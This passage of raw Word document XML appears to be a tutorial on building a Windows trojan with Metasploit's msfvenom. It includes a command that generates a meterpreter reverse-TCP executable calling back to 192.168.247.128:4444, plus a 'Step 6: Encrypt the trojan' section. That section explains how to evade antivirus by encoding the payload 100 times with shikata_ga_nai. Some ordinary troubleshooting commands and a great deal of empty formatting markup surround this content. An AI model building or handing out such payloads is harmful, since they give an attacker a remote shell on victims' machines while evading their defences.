          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Directory: The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory is usually writable by all users. Try creating the file there,type: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.247.128 LPORT=4444 -f exe &gt; /tmp/trojan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify Disk Space: Ensure that there is enough disk space available on the device,type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">df -h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>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Check for File System Issues: Sometimes file system issues can cause permission errors. Check for file system integrity,type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dmesg | grep -i error</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If none of these steps resolve the issue, you might need to check for system-wide policies or restrictions that might be preventing file creation in certain directories or with certain permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3721100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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Style w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="180" w:before="0" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gpto0wywpv6q" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6: Encrypt the trojan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since windows/meterpreter/reverse_tcp is a common exploit, many antivirus programs will detect it. However, we can encrypt the program so that an antivirus can’t catch it. Included with metasploit is a long list of encryptors. Type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3721100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="12"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b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you choose the encryption you want (we recommend x86/shikata_ga_nai), you can encrypt it multiple times when you type in the command to make the exploit. Encrypting the file multiple times helps prevent antivirus programs from catching your virus. Type in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">umask 0022</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.247.128 LPORT=4444 -e x86/shikata_ga_nai -i 100 -f exe &gt; encryptedtrojan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3721100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3721100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="10"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b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>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b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>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b w:val="1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>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99">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>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9A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>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9D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>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9E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>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A1">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>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A2">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A3">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A4">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">
      <w:pPr>
        <w:rPr>
